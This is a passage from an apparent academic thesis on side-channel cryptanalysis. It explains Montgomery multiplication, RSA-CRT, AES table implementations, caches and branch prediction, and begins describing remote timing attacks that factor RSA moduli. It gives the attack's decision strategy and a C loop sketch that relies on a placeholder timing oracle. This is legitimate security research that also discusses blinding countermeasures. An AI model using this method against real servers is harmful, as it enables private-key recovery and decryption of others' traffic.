the unbalanced and key-dependent conditional branch in the above Figures 2.1 and 2.3, and by simply inserting dummy operations into the flow in order to make the operations after the conditional branch more balanced, c.f. [52]. As this “dummy equipped” binary SM algorithm still had some negative side effects, a very active research area arose around the so-called Balanced Montgomery Powering Ladder, shown in Figure 2.4.
This exponentiation is assumed to be “intrinsically secure” against simple side-channel attacks, c.f. [52], and also has many computational advantages over the above basic SM algorithm. Unfortunately, as we explain later in Chapter 7, all those “balanced branch” exponentiation algorithms are “intrinsically insecure” in the presence of Branch Prediction attacks.
2.1.3. Montgomery Multiplication
Montgomery Multiplication (MM) is the most efficient algorithm to compute a modular multiplication. It uses additions and divisions by powers of 2,
which can be accomplished by shifting the operand to the right, to calculate the
result; therefore it is very suitable for hardware architectures. Since it eliminates
time consuming integer division operations, the efficiency of the algorithm is very
high.
Montgomery Multiplication is used to calculate
Z = A ∗ B ∗ R^{−1} (mod N),

where A and B are the N-residues of a and b with respect to R, R is a constant power of 2, and R^{−1} is the inverse of R modulo N:

A = a ∗ R (mod N),
B = b ∗ R (mod N),
R^{−1} ∗ R = 1 (mod N),

and R > N. Another constraint is that R has to be relatively prime to N. Since N is a product of two large primes in RSA, choosing R as a power of 2 is sufficient to guarantee that these two numbers are relatively prime. If N is a k-bit odd number, then 2^k is the most suitable value for R.
A conversion to and from N-residue format is required to use this algorithm. Hence, it is most attractive for repeated multiplications on the same residue, as in modular exponentiation. Figure 2.5 shows the algorithm to compute a Montgomery multiplication. The conditional subtraction (S − N) in the third line is called the ‘extra reduction’. This conditional subtraction step is the
S = A ∗ B
S = (S − (S ∗ N^{−1} mod R) ∗ N) / R
if S > N then S = S − N
return S

FIGURE 2.5. Montgomery Multiplication Algorithm
main source of data dependent execution time variations exploited in classical
timing attacks on RSA (c.f. Chapter 3 and [6, 21, 34, 85, 88]).
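To make the extra reduction tangible, here is a small Python sketch of Montgomery multiplication under the stated constraints (R = 2^k > N, N odd). It uses a common addition-based reduction variant rather than the subtraction written in Figure 2.5, and it also reports whether the conditional subtraction was taken, since that data-dependent event is what the timing attacks exploit. All names and parameters are illustrative.

def montgomery_multiply(a_bar: int, b_bar: int, n: int, k: int):
    # One Montgomery multiplication with R = 2^k (illustrative sketch).
    # Returns (a_bar * b_bar * R^-1 mod n, whether the extra reduction was taken).
    r = 1 << k
    n_prime = (-pow(n, -1, r)) % r       # N' = -N^-1 mod R
    s = a_bar * b_bar
    m = (s * n_prime) & (r - 1)          # m = s * N' mod R (cheap masking)
    s = (s + m * n) >> k                 # exact division by R
    extra_reduction = s >= n
    if extra_reduction:                  # the conditional 'extra reduction'
        s -= n
    return s, extra_reduction

# toy usage: multiply 30 and 40 modulo 97 via Montgomery form
n, k = 97, 7                             # R = 128 > n and gcd(R, n) = 1
r = 1 << k
a_bar, b_bar = (30 * r) % n, (40 * r) % n
z_bar, took_extra = montgomery_multiply(a_bar, b_bar, n, k)
assert (z_bar * pow(r, -1, n)) % n == (30 * 40) % n
print("extra reduction taken:", took_extra)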
2.1.4. Chinese Remainder Theorem
The Chinese Remainder Theorem (CRT) is one of the oldest and most famous theorems in Number Theory. We will not explain the details of the CRT in this thesis, only its use to speed up RSA operations. Instead of computing P = M^d (mod N) directly, a more complex method can be used to perform the same operation roughly 4 times faster. The algorithm is described in Figure 2.6. Using the Chinese Remainder Theorem, we replace a modular exponentiation with the full-length modulus N by two modular exponentiations with the half-length moduli p and q. Note that this method can only be used by the owner of the secret key, since it requires knowledge of the factors of N.
Step 1: a) u_p := M (mod p)
        b) d_p := d (mod p − 1)
        c) P_1 := u_p^{d_p} (mod p)
Step 2: a) u_q := M (mod q)
        b) d_q := d (mod q − 1)
        c) P_2 := u_q^{d_q} (mod q)
Step 3: Return ((p^{−1} (mod q)) ∗ (P_2 − P_1) (mod q)) ∗ p + P_1

FIGURE 2.6. RSA with CRT
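A direct Python transcription of these steps, shown below with hypothetical toy parameters, may be useful as a sanity check; it is an illustration only, not the OpenSSL code discussed later.

def rsa_crt_decrypt(m: int, d: int, p: int, q: int) -> int:
    # RSA exponentiation with CRT, following the steps of Figure 2.6.
    u_p = m % p                          # Step 1
    d_p = d % (p - 1)
    p1 = pow(u_p, d_p, p)
    u_q = m % q                          # Step 2
    d_q = d % (q - 1)
    p2 = pow(u_q, d_q, q)
    p_inv = pow(p, -1, q)                # Step 3: p^-1 mod q, then recombine
    return ((p_inv * (p2 - p1)) % q) * p + p1

# toy check against the direct computation
p, q, e = 61, 53, 17
n = p * q
d = pow(e, -1, (p - 1) * (q - 1))
for m in (2, 42, 1234):
    assert rsa_crt_decrypt(m, d, p, q) == pow(m, d, n)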
2.2. Basics of AES and Its Implementations
2.2.1. Overview of AES
Rijndael [31] is a symmetric block cipher, which was announced as the Advanced Encryption Standard (AES) by NIST [8]. AES allows key sizes of 128, 192, and 256 bits and operates on 128-bit blocks. For simplicity, we will describe only the 128-bit version of the algorithm in this document.
AES performs operations on a 4x4 byte matrix, called the State, which is the basic data structure of the algorithm. The algorithm is composed of a certain number of rounds depending on the length of the key. When the key is 128 bits long, the encryption algorithm has 10 rounds of computations, all of which except the last one perform the same operations. Each round is built from a set of component functions and a round key, which is derived from the original cipherkey. The four component functions are
component functions are
1. SubBytes Transformation,
2. ShiftRows Transformation,
3. MixColumns Transformation,
4. and AddRoundKey Operation.
The AES encryption algorithm has an initial application of the AddRoundKey operation followed by 9 rounds and a final round. The first 9 rounds use all
of these component functions in the given order. The MixColumns Transformation is excluded in the last round. A separate key scheduling function is used to
generate all of the round keys, which are also represented as 4x4 byte-matrices,
from the initial key. The details of the algorithm can be found in [31] and [8].
2.2.2. AES Software Implementations
The primary concern of the software implementations of AES is the efficiency in terms of speed. Many efficient implementations have been proposed
since the selection of Rijndael as AES. In this paper, we will focus on the one
described in [31], which is the most efficient and the most widely used one.
In this implementation, all of the component functions, except AddRoundKey, are combined into four different tables and the rounds turn to be composed
of table lookups and bit-wise xor operations (Figure 2.7). Before the first round,
there is an extra round key addition, which adds the cipherkey to the state that
24
.
FIGURE 2.7. Round operations in AES
has the actual plaintext. In other words, the input to the first table lookup is the
bitwise addition of the plaintext and the cipherkey.
The most widely used software implementation of AES is described in [31], and it is designed especially for 32-bit architectures. To speed up encryption, all of the component functions of AES, except AddRoundKey, are combined into lookup tables, and the rounds turn out to be composed of table lookups and bitwise exclusive-or operations. The five lookup tables T0, T1, T2, T3, T4 employed in this implementation are generated from the actual AES S-box values in the following way:
T0[x] = (2 • s(x), s(x), s(x), 3 • s(x)),
T1[x] = (3 • s(x), 2 • s(x), s(x), s(x)),
T2[x] = (s(x), 3 • s(x), 2 • s(x), s(x)),
T3[x] = (s(x), s(x), 3 • s(x), 2 • s(x)),
T4[x] = (s(x), s(x), s(x), s(x)),

where s(x) and • stand for the result of an AES S-box lookup for the input value x and the finite field multiplication in GF(2^8) as it is realized in AES, respectively.
The round computations, except in the last round, are of the form

(S^{r+1}_{4i}, S^{r+1}_{4i+1}, S^{r+1}_{4i+2}, S^{r+1}_{4i+3}) = (RK^{r}_{4i}, RK^{r}_{4i+1}, RK^{r}_{4i+2}, RK^{r}_{4i+3}) ⊕ T0[S^{r}_{4i}] ⊕ T1[S^{r}_{(4i+5) mod 16}] ⊕ T2[S^{r}_{(4i+10) mod 16}] ⊕ T3[S^{r}_{(4i+15) mod 16}],

where S^{r}_{i} is byte i of the intermediate state value that becomes the input of round r, RK^{r}_{i} is the i-th byte of the r-th round key, and i ∈ {0, ..., 3}.
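The following Python sketch illustrates the data flow of this T-table round structure. It is a simplified, hypothetical rendering: the stand-in S-box s(x) = x is used only to keep the sketch short and runnable, whereas the real tables are built from the Rijndael S-box; the index pattern and the xor combination, however, follow the formula above.

def make_tables(sbox):
    # Build T0..T3 from a given S-box, following the table definitions above.
    def xtime(a):                      # multiplication by 2 in GF(2^8)
        return ((a << 1) ^ 0x1B) & 0xFF if a & 0x80 else (a << 1)
    T0, T1, T2, T3 = [], [], [], []
    for x in range(256):
        s = sbox[x]
        s2, s3 = xtime(s), xtime(s) ^ s
        T0.append((s2 << 24) | (s << 16) | (s << 8) | s3)
        T1.append((s3 << 24) | (s2 << 16) | (s << 8) | s)
        T2.append((s << 24) | (s3 << 16) | (s2 << 8) | s)
        T3.append((s << 24) | (s << 16) | (s3 << 8) | s2)
    return T0, T1, T2, T3

def round_column(i, state, round_key_words, T0, T1, T2, T3):
    # Compute output column i (a 32-bit word) of one inner round;
    # `state` holds the 16 input bytes S^r, `round_key_words` four round-key words.
    return (round_key_words[i]
            ^ T0[state[4 * i]]
            ^ T1[state[(4 * i + 5) % 16]]
            ^ T2[state[(4 * i + 10) % 16]]
            ^ T3[state[(4 * i + 15) % 16]])

# usage with a stand-in S-box (identity); real AES uses the Rijndael S-box
identity_sbox = list(range(256))
T0, T1, T2, T3 = make_tables(identity_sbox)
state = list(range(16))                # hypothetical 16-byte round input
rk = [0x00000000] * 4                  # hypothetical round-key words
columns = [round_column(i, state, rk, T0, T1, T2, T3) for i in range(4)]
print([hex(c) for c in columns])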
2.3. Basics of Computer Microarchitecture: Cache and Branch Prediction
In this section, we outline the basics of some processor components, which
have been identified as sources of side-channel leakage. Although it is beneficial —
in order to completely understand the attacks as described later — to know many
details about modern computer architecture and especially cache and branch prediction schemes, it is unrealistic to explain all these subtle details here. Thus,
we refer the reader to [78, 91, 92] for a thorough treatment of these topics. Nevertheless, we now explain the basic concepts common to most cache and branch
prediction units, although the exact details differ from processor to processor and
are not completely documented in freely available processor manuals.
2.3.1. Processor Cache
A high-frequency processor needs to retrieve data at a very high speed in order to utilize its functional resources. The latency of main memory is not short enough to match this demand for high speed data delivery. The gap between the latency of main memories and the actual demand of processors has been and will be continuously increasing as long as Moore’s Law holds. Common to all processors, the attempt to close this gap is the employment of a special buffer called a cache.
A cache is a small and fast memory area used by the processor to reduce the average time to access main memory. It stores copies of the most frequently used data.¹ The employment of a cache in a processor reduces the average memory access time because data, including instructions, has several locality properties that can be taken advantage of. Temporal locality is one of these properties; it exploits the assumption that recently used data will probably be needed in the near future. The other property is spatial locality, which assumes that data located near currently used data will also be needed in the near future.
When the processor needs to read a location in main memory, it first checks
to see if the data is already in the cache. If the data is already in the cache (a
cache hit), the processor immediately uses this data instead of accessing the main
memory, which has a longer latency than a cache. Otherwise (a cache miss), the
data is read from the memory and a copy of it is stored in the cache. This copy
is expected to be used in the near future due to the temporal locality property.
The minimum amount of data that can be read from the main memory into the
cache at once is called a cache line or a cache block, i.e., each cache miss causes a cache block to be retrieved from a higher level memory. The reason why a block of data is transferred from the main memory to the cache, instead of transferring only the data that is currently needed, lies in the spatial locality property.
¹ Although it depends on the particular data replacement policy, this assumption is true almost all the time for current processors.
Design and implementation of a cache take several parameters into consideration to meet the desired cost/performance metrics. These parameters include:
• number of levels of cache
• size of these caches
• latency of these caches
• penalty of a cache miss in these levels
• size of a cache block in these levels
• overhead of updating main memory and higher level caches
Further details on these parameters and specific values used in particular processors are not given in this document, but can be found in [43, 78, 39]. Before
moving on to the next section, where we describe the basics of branch prediction,
we want to mention two very important concepts that affect the performance of
a cache: the mapping strategy and the replacement policy.
Cache mapping strategy is the method of deciding where to store, and
thus to search for, a data in a cache. Three main cache mapping strategies are
direct, fully associative and set associative mapping. In a direct mapped cache, a
particular data block can only be stored in a single certain location in the cache.
On the contrary, a data block can be placed in any location in a fully associative
cache. The location of a particular placement is determined by the replacement
policy. Set associative mapping is a blend of these two mapping strategies. Set
associative caches are divided into a number of equally sized sets, and each set contains
the same fixed number of cache blocks. A data block can be stored only in a certain
cache set (just like in a direct mapped cache); however, it can be placed in any
location inside this set (like in a fully associative cache). Again, the particular
location of a data block inside its cache set is determined by the replacement policy.
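In a set associative cache, the set that a given address maps to is a simple function of the address, the line size, and the number of sets. A minimal sketch under an assumed geometry (64-byte lines, 128 sets; not the parameters of any particular processor) illustrates the mapping:

/* Hedged sketch: which cache set does an address map to?
 * The geometry below is an illustrative assumption. */
#include <stdint.h>
#include <stdio.h>

#define LINE_SIZE 64u     /* bytes per cache line        */
#define NUM_SETS  128u    /* number of sets in the cache */

static unsigned cache_set_index(uintptr_t addr) {
    /* Drop the byte offset inside the line, then take the remaining
     * low-order bits as the set index. */
    return (unsigned)((addr / LINE_SIZE) % NUM_SETS);
}

int main(void) {
    uintptr_t a = 0x1234u;
    printf("address 0x%lx maps to set %u\n",
           (unsigned long)a, cache_set_index(a));
    return 0;
}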
The replacement policy is the method of deciding which data block to evict
from the cache in order to place the new one in. The ultimate goal is to choose the
data that is most unlikely to be used in the near future. There are several cache
replacement policies proposed in the literature (c.f. [43, 78]). In this document, we
focus on a specific one: least-recently-used (LRU). It is the most commonly used
policy and it picks the data that is least recently used among all of the candidate
data blocks that can be evicted from the cache.
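As an illustration of how LRU behaves within one cache set, the following toy model (a simplified assumption, not any vendor's actual implementation, which typically uses approximations of LRU) keeps a per-way age counter and evicts the oldest way on a miss:

/* Hedged toy model of LRU replacement inside a single cache set. */
#include <stdio.h>
#include <stdint.h>

#define WAYS 4

typedef struct {
    uint64_t tag[WAYS];
    int      valid[WAYS];
    unsigned age[WAYS];      /* larger age = used longer ago */
} cache_set_t;

/* Access a tag in the set; returns 1 on a hit, 0 on a miss. */
static int access_set(cache_set_t *s, uint64_t tag) {
    for (int w = 0; w < WAYS; w++) s->age[w]++;       /* everyone grows older */

    for (int w = 0; w < WAYS; w++)
        if (s->valid[w] && s->tag[w] == tag) {        /* cache hit */
            s->age[w] = 0;                            /* mark most recently used */
            return 1;
        }

    /* Cache miss: prefer an empty way, otherwise evict the LRU way. */
    int victim = 0;
    for (int w = 0; w < WAYS; w++) {
        if (!s->valid[w]) { victim = w; break; }
        if (s->age[w] > s->age[victim]) victim = w;
    }
    s->tag[victim]   = tag;
    s->valid[victim] = 1;
    s->age[victim]   = 0;
    return 0;
}

int main(void) {
    cache_set_t set = {0};
    /* Tags 1-4 fill the set; 5 evicts the LRU block (tag 2); the final 2 misses. */
    uint64_t trace[] = {1, 2, 3, 4, 1, 5, 2};
    for (unsigned i = 0; i < sizeof trace / sizeof trace[0]; i++)
        printf("tag %llu -> %s\n", (unsigned long long)trace[i],
               access_set(&set, trace[i]) ? "hit" : "miss");
    return 0;
}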
2.3.2. Branch Prediction Units
Deep CPU pipelines paired with the CPU's ability to fetch and issue multiple
instructions at every machine cycle led to the concept of superscalar processors.
Superscalar processors admit a theoretical, or best-case, performance of less than
1 machine cycle per completed instruction, c.f. [92]. However, the branch instructions
that are inevitably required in the underlying machine languages were soon
recognized as one of the most painful performance killers of superscalar processors.
Not surprisingly, CPU architects quickly invented the concept of branch predictors
in order to circumvent those performance bottlenecks, and there has been vibrant
and very practical research on more and more sophisticated branch prediction
mechanisms ever since, c.f. [78, 91, 92]. Unfortunately, we identify branch prediction
as a novel and unforeseen side channel, and thus another new security threat within
the computer security field.
Superscalar processors have to execute instructions speculatively to overcome control hazards, c.f. [92, 78]. The negative effect of control hazards on the
effective machine performance increases as the depth of pipelines increases. This
fact makes the efficiency of speculation one of the key issues in modern superscalar processor design. The solution to improve the efficiency is to speculate
on the most likely execution path. The success of this approach depends on the
accuracy of branch prediction. Better branch prediction techniques improve the
overall performance a processor can achieve, c.f. [92, 78].
A branch instruction is a point in the instruction stream of a program
where the next instruction is not necessarily the next sequential one. There are
two types of branch instructions: unconditional branches (e.g. jump instructions,
goto statements, etc.) and conditional branches (e.g. if-then-else clauses, for and
while loops, etc.). For conditional branches, the decision to take or not to take
the branch depends on some condition that must be evaluated in order to make
the correct decision. During this evaluation period, the processor speculatively
executes instructions from one of the possible execution paths instead of stalling
while awaiting the decision. Thus, it is very beneficial for the branch prediction
algorithm to predict the most likely execution path of a branch. If the prediction is
true, the execution continues without any delays. If it is wrong, which is called a
misprediction, the instructions in the pipeline that were speculatively issued have to
be flushed and the execution starts over from the point of the mispredicted branch.
Therefore, the execution time suffers from a misprediction.
The misprediction penalty obviously increases in terms of clock cycles as the depth
of pipeline extends. To execute the instructions speculatively after a branch, the
CPU needs the following information:
• The outcome of the branch. The CPU has to know the outcome of a branch,
i.e., taken or not taken, in order to execute the correct instruction sequence.
However, this information is not available immediately when a branch is
issued. The CPU needs to execute the branch to obtain the necessary information, which is computed in later stages of the pipeline. Instead of
awaiting the actual outcome of the branch, the CPU tries to predict the
instruction sequence to be executed next. This prediction is based on the
history of the same branch as well as the history of other branches executed
just before the current branch, cf. [92].
• The target address of the branch. The CPU tries to determine if a branch
needs to be taken or not taken. If the prediction turns out to be taken, the
instructions in the target address have to be fetched and issued. This action
of fetching the instructions from the target address requires the knowledge
of this address. Similar to the outcome of the branch, the target address
may not be immediately available too. Therefore, the CPU tries to keep
records of the target addresses of previously executed branches in a buffer,
the so called Branch Target Buffer (BTB).
The overall structure common to all Branch Prediction Units (BPU) is shown in Figure 2.8.
As shown, the BPU consists mainly of two “logical” parts, the BTB and
the predictor. As mentioned above, the BTB is the buffer where the CPU stores
the target addresses of the previously executed branches. Since this buffer is
limited in size, the CPU can store only a limited number of such target addresses, and
previously stored addresses may be evicted from the buffer if a new address needs
to be stored instead.
The predictor is the part of the BPU that makes the prediction on the
outcome of the branch in question. There are different parts of a predictor,
i.e., Branch History Registers (BHR), such as the global history register or local
history registers, and branch prediction tables, cf. [92]. Further details of branch
prediction can be found in [78, 91, 92].

FIGURE 2.8. Branch Prediction Unit Architecture
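To make the predictor part concrete, the sketch below shows a classic two-bit saturating counter scheme indexed by (part of) the branch address. This is a textbook illustration under simplified assumptions, not the predictor of any specific CPU; the table size and indexing are placeholders.

/* Hedged sketch of a 2-bit saturating-counter branch predictor. */
#include <stdint.h>
#include <stdio.h>

#define PHT_ENTRIES 1024          /* pattern history table size (assumption) */

static uint8_t pht[PHT_ENTRIES];  /* counters: 0,1 = predict not taken; 2,3 = taken */

static int predict(uintptr_t branch_addr) {
    return pht[branch_addr % PHT_ENTRIES] >= 2;      /* 1 = predict taken */
}

static void update(uintptr_t branch_addr, int taken) {
    uint8_t *c = &pht[branch_addr % PHT_ENTRIES];
    if (taken  && *c < 3) (*c)++;                    /* saturate at 3 */
    if (!taken && *c > 0) (*c)--;                    /* saturate at 0 */
}

int main(void) {
    uintptr_t b = 0x400123;
    int outcomes[] = {1, 1, 1, 0, 1, 1};             /* a mostly-taken branch */
    for (unsigned i = 0; i < 6; i++) {
        printf("prediction %d, actual %d\n", predict(b), outcomes[i]);
        update(b, outcomes[i]);
    }
    return 0;
}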
3. REMOTE TIMING ATTACK ON RSA
Several timing attacks have been developed against specific RSA implementations
since the introduction of side-channel cryptanalysis in [59]. For example, [59] and [34]
describe timing attacks on RSA implementations which do not utilize the Chinese
Remainder Theorem (CRT). These attacks were generalized and
cannot be applied to RSA implementations that use CRT, it had been thought
for years that RSA-CRT was immune to timing attacks.
However, in [85], a new and efficient attack on RSA implementations that
use CRT with Montgomery’s multiplication algorithm was introduced. Under
optimal conditions, it takes about 300 timing measurements to factorize 1024-bit
RSA moduli. We note that these attacks can be prevented by blinding techniques
(c.f. [59], Sect. 10).
Typical targets of timing attacks are the security features in smart cards.
Despite of Bleichenbacher’s attack ( [16]), which (e.g.) exploited weak implementations of the SSL handshake protocol, the vulnerability of RSA implementations
running on servers was not known until Brumley and Boneh performed a timing
attack over a local network in 2003 ( [21]). They mimicked the attack introduced
in [85] to show that RSA implementation of OpenSSL [71], which is the most
widely used open source crypto library, was not immune to such attacks. Although blinding techniques for smart cards had already been ‘folklore’ for years,
various crypto libraries that were used by SSL implementations did not apply
these countermeasures at that time (c.f. [21]).
In this chapter, we present a timing attack which improves on [21] by a
factor of more than 10 [6]. All of these timing attacks ([59, 34, 88, 85, 21]),
including the one presented in this chapter, can be prevented by base blinding
or exponent blinding. However, it is always desirable to understand the full risk
potential of an attack in order to confirm the trustworthiness of existing
countermeasures and implementations or, if necessary, to develop more secure and
efficient ones.
Our attack exploits a peculiarity of the sliding window exponentiation
algorithm and, independently, suggests a general improvement of the decision
strategy. Although it is difficult to compare the efficiency of attacks performed in
different environments (c.f. [21]), it is obvious that our new attack improves the
efficiency of Brumley and Boneh’s attack by a factor of at least 10.
3.1. General Idea of a Timing Attack on RSA-CRT
Most RSA implementations use the Chinese Remainder Theorem (CRT)
to compute the modular exponentiation. CRT reduces the computation time by
about 75%, compared to a straightforward exponentiation (c.f. Section 2.1.4).
Montgomery Multiplication (MM) is the most efficient algorithm to compute modular
multiplications during a modular exponentiation. Since it eliminates time-consuming
integer divisions, the efficiency of the algorithm is very high. See Sections 2.1.4 and
2.1.3 for details of these algorithms.
Since the operand size of the arithmetic operations can simply be assumed
to be constant during RSA exponentiation, the time required to perform integer
operations in MM can also be assumed to depend only on the constants N and R
but not on the operands A and B. This assumption is very reasonable for smart
cards whereas software implementations may process small operands (i.e., those
with leading zero-words) faster due to optimizations of the integer multiplication
algorithm. In fact, this is the case for many SSL implementations, which complicates
the attack described in [21] as well as ours. (Both attacks are chosen-input attacks
where small operands occur.) Under the simplifying assumption from above, we
can conclude that Time(MM(A, B; N)) ∈ {c, c + c_ER}, where Time(MM(A, B; N))
is the execution time of MM(A, B; N), the Montgomery multiplication with the
input values A, B, and N. The Montgomery operation requires a processing time
of c + c_ER iff the extra reduction has to be carried out.

1.) ȳ_1 := MM(M, R^2; n)          (= M·R (mod n))
2.) Modular Exponentiation Algorithm
    a) table initialization (if necessary)
    b) exponentiation phase
3.) Return MM(temp, 1; n)          (= M^d (mod n))

FIGURE 3.1. Modular Exponentiation with Montgomery's Algorithm
In the rest of this chapter, we denote the public RSA modulus as n instead
of the capital letter N , because we need to use N to denote another variable.
Figure 3.1 explains how Montgomery’s multiplication algorithm can be
combined with arbitrary modular exponentiation algorithms to compute M^d (mod n).
The variable temp in Phase 3 represents the result of the exponentiation phase.
Of course, in Phase 2a and 2b modular squarings and multiplications have to be
replaced by the respective Montgomery operations.
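For reference, the following is a minimal, hedged sketch of a single-word Montgomery multiplication (real RSA operands are multi-word; the constant R = 2^32 and the precomputed value n_prime = -N^(-1) mod R are assumptions of this toy version). It makes the conditional extra reduction, the source of the timing difference between c and c + c_ER, explicit.

/* Hedged sketch of Montgomery multiplication MM(A, B; N) with R = 2^32.
 * Assumes A, B < N < 2^31, N odd, and n_prime = -N^(-1) mod 2^32 precomputed. */
#include <stdint.h>

uint32_t montgomery_mul(uint32_t A, uint32_t B, uint32_t N, uint32_t n_prime) {
    uint64_t t = (uint64_t)A * B;
    uint32_t m = (uint32_t)t * n_prime;          /* m = t * (-N^-1) mod R  */
    uint64_t u = (t + (uint64_t)m * N) >> 32;    /* u = (t + m*N) / R      */
    if (u >= N)
        u -= N;                                  /* extra reduction: the data-dependent step */
    return (uint32_t)u;
}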
The different attacks [85] and [21] exploit the timing behavior of the Montgomery multiplications in Phase 2b of the modular exponentiation (c.f. Figure
3.1). We can interpret the execution time of the i-th Montgomery operation in
Phase 2b (a squaring or a multiplication by a table value) as a realization of the
random variable c + W_i · c_ER, where W_1, W_2, . . . denotes a sequence of {0, 1}-valued
random variables. The stochastic process W_1, W_2, . . . has been studied in detail
in [86, 85, 87]. We merely mention that


\[
E(W_i) = \begin{cases}
\dfrac{1}{3}\,\dfrac{n}{R} & \text{for } MM(\mathrm{temp}, \mathrm{temp}; n) \\[6pt]
\dfrac{1}{2}\,\dfrac{\bar{y}_j}{n}\,\dfrac{n}{R} & \text{for } MM(\mathrm{temp}, \bar{y}_j; n)
\end{cases} \tag{3.1}
\]
where ȳj and temp denote a particular table entry and an intermediate result during the exponentiation, respectively. ‘E(·)’ denotes the expectation of a random
variable. The timing behavior of the Montgomery operations in Phase 2a) can
similarly be described by a process W′_1, W′_2, . . . .
When applying the CRT, (3.1) indicates that the probability of an extra
reduction during a Montgomery multiplication of the intermediate result temp
with ȳ1;p = M ∗ R (mod p) in Step 1 (resp. with ȳ1;q = M ∗ R (mod q) in Step 2)
is linear in ȳ_{1;p}/p (resp. linear in ȳ_{1;q}/q). Note that the message (u · R^{-1}) (mod
n) corresponds to the value u during the exponentiation, because the messages
are multiplied by R to convert them into Montgomery form. If the base of the
exponentiation is y := uR^{-1} (mod n), then ȳ_{1;p} = yR ≡ u (mod p) and ȳ_{1;q} =
yR ≡ u (mod q). The same equation also implies that the same probability does
not depend on y during the squarings.
For 0 < u_1 < u_2 < n with u_2 − u_1 ≪ p, q, three cases are possible: the
'interval set' {u_1 + 1, . . . , u_2} contains no multiple of p or q (Case A), contains
a multiple of p or q but not of both (Case B), or contains multiples of both p and
q (Case C). The running time for input y := uR^{-1} (mod n), denoted by T(u), is
interpreted as a realization of a normally distributed random variable X_u.
If the square and multiply exponentiation algorithm is applied, the computation
of P_1 during the CRT operations (c.f. Figure 2.6) requires about log_2(n)/4
multiplications with ȳ_{1;p}, and hence (3.1) implies
\[
E(X_{u_2} - X_{u_1}) \approx \begin{cases}
0 & \text{for Case A} \\[4pt]
-\,c_{ER}\,\dfrac{\sqrt{n}}{8R}\,\log_2(n) & \text{for Case B} \\[4pt]
-\,c_{ER}\,\dfrac{\sqrt{n}}{4R}\,\log_2(n) & \text{for Case C.}
\end{cases}
\]
This property allows us to devise a timing attack that factorizes the modulus
n by exposing one of the prime factors, e.g. q, bit by bit. We use the fact
that if the interval (u_1, u_2], i.e., the integers in {u_1 + 1, u_1 + 2, ..., u_2}, contains
a multiple of q, i.e., in Case B or C, then T(u_1) − T(u_2) will be smaller than
c_ER log_2(n)√n / (16R). Let us say the attacker already knows that q is in (u_1, u_2]
(after checking several intervals; = Phase 1 of the attack) and is trying to reduce
the search space. In Phase 2 the decision strategy becomes:
1. Split the interval into two equal parts: (u_1, u_3] and (u_3, u_2], where u_3 =
⌊(u_1 + u_2)/2⌋. As usual, ⌊z⌋ denotes the largest integer that is ≤ z.

2. If T(u_3) − T(u_2) < c_ER log_2(n)√n / (16R), decide that q is in (u_3, u_2]; otherwise
decide that it is in (u_1, u_3].

3. Repeat the first two steps until the final interval becomes small enough to
factorize n using the Euclidean algorithm.
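A minimal sketch of this Phase 2 loop is given below; the timing oracle measure_T() and the value THRESHOLD are hypothetical placeholders standing in for the actual remote measurements and for c_ER log_2(n)√n/(16R), which the attacker has to estimate.

/* Hedged sketch of the Phase 2 interval-halving loop using GMP integers. */
#include <gmp.h>

extern double measure_T(const mpz_t u);   /* decryption time for input u*R^-1 mod n (assumed) */
extern double THRESHOLD;                  /* decision threshold (assumed known or estimated)   */

/* Narrow (u1, u2] down; the prime factor q is assumed to stay inside it. */
void phase2(mpz_t u1, mpz_t u2, unsigned rounds) {
    mpz_t u3;
    mpz_init(u3);
    for (unsigned i = 0; i < rounds; i++) {
        mpz_add(u3, u1, u2);
        mpz_fdiv_q_ui(u3, u3, 2);                 /* u3 = floor((u1 + u2) / 2)    */
        if (measure_T(u3) - measure_T(u2) < THRESHOLD)
            mpz_set(u1, u3);                      /* decide that q is in (u3, u2] */
        else
            mpz_set(u2, u3);                      /* decide that q is in (u1, u3] */
    }
    mpz_clear(u3);
}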
At any time within Phase 2 the attacker can check whether her previous
decisions have been correct. To confirm that an interval really contains q the
attacker applies the decision rule to similar but different intervals, e.g., (u1 + 1,
u2 − 1], and confirms the interval if they yield the same decision.
In fact, it is sufficient to recover only the upper half of the bit representation
of either p or q to factorize n by applying a lattice-based algorithm [27].
Under ideal conditions (no measurement errors) this attack requires about
300 time measurements to factorize a 1024-bit RSA modulus n ≈ 0.7 · 2^1024, if
the square and multiply algorithm is used. In Phase 2 of the attack, each decision
essentially recovers one further bit of the binary representation of one prime factor.
The details and analysis of this attack can be found in [85].
3.2. Overview of Brumley and Boneh Attack
We explain the attack of [21], which will be referred to as the BB-attack from here
on, and ours in the following two sections along with a discussion of the advantages
of our attack over the other.
The RSA implementation of OpenSSL version 0.9.7 used to employ Montgomery
Multiplication, CRT, and Sliding Window Exponentiation (SWE) with
a window size, denoted by wsize, of 5.¹ The SWE algorithm processes the exponent
d by splitting it into odd windows of at most wsize consecutive bits (i.e.,
into substrings of length ≤ wsize having an odd binary representation), where the
windows are not necessarily consecutive and may be separated by zero bits (c.f.
Section 2.1.2.3). It requires a preprocessing phase, i.e., table initialization, to
compute odd powers of the base y so that many multiplications can be combined
during the exponentiation phase.

1 At the time our paper ([6]) was written, the latest version of the OpenSSL library was
0.9.7. OpenSSL changed this particular RSA implementation configuration and started to
employ a b-ary exponentiation algorithm with additional mitigation techniques to protect
RSA against cache-based side-channel attacks starting with version 0.9.8, after the advances
in the microarchitectural side-channel area discussed in the later chapters of this document.
The modulus n is a 1024-bit number, which is the product of two 512-bit
primes p and q. Considering one of these primes, say q, the computation of
y_q^{d_q} (mod q) requires 511 Montgomery operations of type MM(temp, temp; q)
('squarings') and approximately (511 · 31)/(5 · 32) ≈ 99 multiplications with the
table entries during the exponentiation phase of SWE (cf. Table 14.16 in [64]).
Consequently, on average ≈ 6.2 multiplications are carried out with the table entry
ȳ_{1;q}.
The BB-attack exploits the multiplications MM(temp, ȳ_{1;q}; q) that are carried
out in the exponentiation phase of SWE. Assume that the attacker tries to recover
q = (q_0, ..., q_{511}) and has already obtained the first, i.e. most significant, k bits. To
guess q_k, the attacker generates g and g_hi, where g = (q_0, ..., q_{k−1}, 0, 0, ..., 0) and
g_hi = (q_0, ..., q_{k−1}, 1, 0, 0, ..., 0). Note that there are two possibilities for q:
g < q < g_hi (when q_k = 0) or g < g_hi < q (when q_k = 1). She determines the
decryption times t_1 = T(g) = Time(u_g^d mod n) and t_2 = T(g_hi) = Time(u_{g_hi}^d mod n),
where u_g = g · R^{-1} (mod n) and u_{g_hi} = g_hi · R^{-1} (mod n). If q_k is 0, then
|t_1 − t_2| must be “large”. Otherwise |t_1 − t_2| must be close to zero, which implies
that q_k is 1. The message u_g (u_{g_hi} resp.) corresponds to the value g (g_hi resp.)
